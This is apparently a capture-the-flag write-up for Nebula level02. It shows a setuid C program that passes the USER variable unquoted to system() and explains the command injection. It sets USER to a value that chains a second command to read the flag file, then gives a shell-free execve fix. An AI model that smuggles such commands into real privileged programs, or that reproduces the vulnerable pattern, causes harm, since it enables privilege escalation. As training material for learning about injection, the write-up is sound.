i春秋 - Exploit-Exercises: Nebula - level02

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code

#define _GNU_SOURCE /* declares asprintf(), setresgid() and setresuid() on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

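  /* Set the real, effective and saved IDs to the effective (setuid) ones,
     so the command started by system() runs with that identity. */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);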

  buffer = NULL;

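  /* USER comes from the caller's environment and is formatted, unquoted,
     into a shell command line. */
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

  /* system() hands the string to /bin/sh -c, which interprets any shell
     metacharacters contained in USER. */
  system(buffer);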
}

Nebula official website

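Program logic

The program prints that the value of the USER environment variable "is cool": it formats USER into a /bin/echo command line and runs that line with system().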

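Approach

Overwrite the USER environment variable. Its value is inserted unquoted into the string passed to system(), so a ";" in it ends the echo command and the shell runs what follows as a second command.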

USER=";cat /home/flag02/flag"
/home/flag02/flag02
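
A shell-free version of the same call, as an added example that is not part of the challenge source or of this write-up: USER is handed to /bin/echo as a single argv element through execve(), so the ";" above is printed instead of interpreted. The helper name echo_user_no_shell, the pipe-based capture and the empty child environment are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper, not part of level02: runs "/bin/echo <user> is cool"
 * with no shell and captures stdout in out. Returns echo's exit status, -1 on error. */
int echo_user_no_shell(const char *user, char *out, size_t outlen)
{
  char *const envp[] = { NULL };   /* child gets an empty environment */
  int fds[2], status;
  size_t used = 0;
  ssize_t n;
  pid_t pid;

  /* A leading '-' would be parsed by echo as an option, so reject it. */
  if (user == NULL || user[0] == '-' || outlen == 0 || pipe(fds) != 0)
    return -1;
  pid = fork();
  if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
  if (pid == 0) {
    char *const args[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
    dup2(fds[1], STDOUT_FILENO);
    close(fds[0]);
    close(fds[1]);
    execve("/bin/echo", args, envp); /* one argv element: no shell parsing */
    _exit(127);
  }
  close(fds[1]);
  while (used < outlen - 1 && (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
    used += (size_t)n;
  out[used] = '\0';
  close(fds[0]);
  if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
    return -1;
  return WEXITSTATUS(status);
}

int main(void)
{
  char out[256];

  if (echo_user_no_shell(getenv("USER"), out, sizeof out) != 0)
    return 1;
  fputs(out, stdout);
  return 0;
}
```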

flag
